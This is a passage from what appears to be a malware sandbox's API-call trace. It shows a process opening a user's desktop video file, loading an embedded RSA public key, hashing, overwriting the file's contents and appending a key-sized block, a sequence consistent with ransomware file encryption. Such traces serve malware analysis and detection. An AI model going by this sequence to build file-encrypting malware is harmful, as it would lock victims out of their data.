8uN4qhj8sMm4.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1jqp 8un4qhj8smm4.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.402] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=99342) returned 1 [0058.402] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.404] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x183e8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.405] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.405] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x1840e, lpOverlapped=0x0) returned 1 [0058.406] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.406] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.406] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.406] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0058.407] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.407] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.407] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.407] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.407] GetLastError () returned 0x0 [0058.407] SetLastError (dwErrCode=0x0) [0058.407] GetLastError () returned 0x0 [0058.407] SetLastError (dwErrCode=0x0) [0058.407] GetLastError () returned 0x0 [0058.407] SetLastError (dwErrCode=0x0) [0058.407] GetLastError () returned 0x0 [0058.407] SetLastError (dwErrCode=0x0) [0058.407] GetLastError () returned 0x0 [0058.407] SetLastError (dwErrCode=0x0) [0058.407] GetLastError () returned 0x0 [0058.407] SetLastError (dwErrCode=0x0) [0058.407] GetLastError () returned 0x0 [0058.407] SetLastError (dwErrCode=0x0) [0058.407] GetLastError () returned 0x0 [0058.407] SetLastError (dwErrCode=0x0) [0058.407] GetLastError () returned 0x0 [0058.407] SetLastError (dwErrCode=0x0) [0058.407] GetLastError () returned 0x0 [0058.407] SetLastError (dwErrCode=0x0) [0058.407] GetLastError () returned 0x0 [0058.407] SetLastError (dwErrCode=0x0) [0058.407] GetLastError () returned 0x0 [0058.407] SetLastError (dwErrCode=0x0) [0058.407] GetLastError () returned 0x0 [0058.408] SetLastError (dwErrCode=0x0) [0058.408] GetLastError () returned 0x0 [0058.408] SetLastError (dwErrCode=0x0) [0058.408] GetLastError () returned 0x0 [0058.408] SetLastError (dwErrCode=0x0) [0058.408] GetLastError () returned 0x0 [0058.408] SetLastError (dwErrCode=0x0) [0058.408] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.408] GetLastError () returned 0x0 [0058.408] SetLastError (dwErrCode=0x0) [0058.408] GetLastError () returned 0x0 [0058.408] SetLastError (dwErrCode=0x0) [0058.408] GetLastError () returned 0x0 [0058.408] SetLastError (dwErrCode=0x0) [0058.408] GetLastError () returned 0x0 [0058.408] SetLastError (dwErrCode=0x0) [0058.408] GetLastError () returned 0x0 [0058.408] SetLastError (dwErrCode=0x0) [0058.408] GetLastError () returned 0x0 [0058.408] SetLastError (dwErrCode=0x0) [0058.408] GetLastError () returned 0x0 [0058.408] SetLastError (dwErrCode=0x0) [0058.408] GetLastError () returned 0x0 [0058.408] SetLastError (dwErrCode=0x0) [0058.408] GetLastError () returned 0x0 [0058.408] SetLastError (dwErrCode=0x0) [0058.408] GetLastError () returned 0x0 [0058.408] SetLastError (dwErrCode=0x0) [0058.409] GetLastError () returned 0x0 [0058.409] SetLastError (dwErrCode=0x0) [0058.409] GetLastError () returned 0x0 [0058.409] SetLastError (dwErrCode=0x0) [0058.409] GetLastError () returned 0x0 [0058.409] SetLastError (dwErrCode=0x0) [0058.409] GetLastError () returned 0x0 [0058.409] SetLastError (dwErrCode=0x0) [0058.409] GetLastError () returned 0x0 [0058.409] SetLastError (dwErrCode=0x0) [0058.409] GetLastError () returned 0x0 [0058.409] SetLastError (dwErrCode=0x0) [0058.409] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0058.409] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.409] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0058.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.409] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.409] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.409] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.409] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.409] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.409] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18410) returned 0x9c82710 [0058.410] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.410] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0058.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0058.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298800 [0058.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f2c8 [0058.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298338 [0058.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac20 [0058.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ae00 [0058.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac50 [0058.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x3292fe8 [0058.410] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x3292fe8, Size=0x218) returned 0x32947b0 [0058.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32949d0 [0058.410] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ae00 | out: hHeap=0x660000) returned 1 [0058.410] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac50 | out: hHeap=0x660000) returned 1 [0058.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949d0 | out: hHeap=0x660000) returned 1 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac50 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6ae00 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac50 | out: hHeap=0x660000) returned 1 [0058.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ae00 | out: hHeap=0x660000) returned 1 [0058.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0058.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0058.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.411] GetCurrentThreadId () returned 0x9e0 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326a688 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x6c2780 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0058.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.412] GetCurrentThreadId () returned 0x9e0 [0058.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0058.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0058.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3292fe8 [0058.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0058.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3282810 [0058.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0058.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0058.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0058.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ae00 [0058.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0058.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0058.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0058.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0058.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac50 [0058.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0058.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0058.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0058.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ace0 [0058.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0058.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0058.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0058.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0058.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6aba8 [0058.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0058.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0058.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0058.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0058.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0058.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ae00 | out: hHeap=0x660000) returned 1 [0058.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ae00 [0058.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0058.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3296fa8 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ae00 | out: hHeap=0x660000) returned 1 [0058.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0058.414] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x32679f8 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3292fe8 | out: hHeap=0x660000) returned 1 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32679f8 | out: hHeap=0x660000) returned 1 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296fa8 | out: hHeap=0x660000) returned 1 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aba8 | out: hHeap=0x660000) returned 1 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac50 | out: hHeap=0x660000) returned 1 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ace0 | out: hHeap=0x660000) returned 1 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0058.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac20 | out: hHeap=0x660000) returned 1 [0058.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3298338 | out: hHeap=0x660000) returned 1 [0058.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3282810 | out: hHeap=0x660000) returned 1 [0058.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0058.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0058.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0058.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0058.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0058.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0058.415] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c82710*, nNumberOfBytesToWrite=0x18409, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c82710*, lpNumberOfBytesWritten=0x9f4fb14*=0x18409, lpOverlapped=0x0) returned 1 [0058.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0058.415] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1840e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.415] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0058.415] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0058.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", 